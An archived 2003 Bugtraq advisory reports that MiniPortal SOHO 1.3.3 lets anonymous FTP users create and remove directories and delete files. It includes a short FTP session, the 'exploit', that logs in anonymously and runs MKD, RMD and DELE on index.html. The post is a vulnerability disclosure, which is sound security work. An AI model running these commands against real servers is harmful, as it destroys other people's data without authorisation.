lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030330191525.24874.qmail@www.securityfocus.com>
Date: 30 Mar 2003 19:15:25 -0000
From: subj <r2subj3ct@...lan.org>
To: bugtraq@...urityfocus.com
Subject: MiniPortal




Product : MiniPortal SOHO
Version : 1.3.3
OSystem : Windows
Authors : Instant Servers Inc
WebSite : http://www.instantservers.com
Problem : Create and Remove directories with anonymous access

Description:
------------

eng:
====
MiniPortal includes the following components:
WEB Server [Apache 1.3.27]
FTP Server
DNS Server
During research of components of the server, the following was revealed:
The anonymous user can create and delete directories on the server,
And also can delete any files on it.


Exploits:
---------
>>Telnet 127.0.0.1 21
220 FTP Server, ready
>> USER anonymous
331 Password required
>> PASS anonymous@...alhost
230 User logged in
>>MKD test
257 "test" created
>>RMD test
200 Okay
>>DELE index.html
200 Okay


Contacts:
---------

r2subj3ct@...lan.org
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc

Thanks:
-------
 DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
 DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ